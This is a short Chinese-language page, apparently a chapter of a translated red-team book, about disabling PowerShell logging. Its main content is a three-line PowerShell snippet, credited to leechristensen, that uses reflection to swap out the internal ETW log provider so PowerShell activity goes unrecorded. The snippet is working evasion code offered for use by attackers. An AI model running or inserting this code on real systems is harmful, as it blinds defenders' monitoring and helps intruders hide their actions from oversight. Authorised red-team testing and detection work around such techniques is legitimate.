禁用 PowerShell 记录

来源:Snowming（雪茗）译浏览 457 扫码分享 2020-10-09 23:20:18

作为红队队员，我们一直在寻找独特的方法来尝试和禁用任何类型的日志记录。虽然现在也有办法执行这些攻击，但我们仍在不断寻找新的更简单的技术。

以下是一个 leechristensen 写的示例，可用于禁用 PowerShell 日志记录：

$EtwProvider = [Ref].Assembly.GetType(‘System.Management.Automation.Tracing.PSEtwLogProvider’).GetField(‘etwProvider’,’NonPublic,Static’);
$EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
$EtwProvider.SetValue($null, $EventProvider);

当前内容版权归 Snowming（雪茗）译或其关联方所有，如需对内容或内容相关联开源项目进行关注与资助，请访问 Snowming（雪茗）译 .

本文档使用 BookStack 构建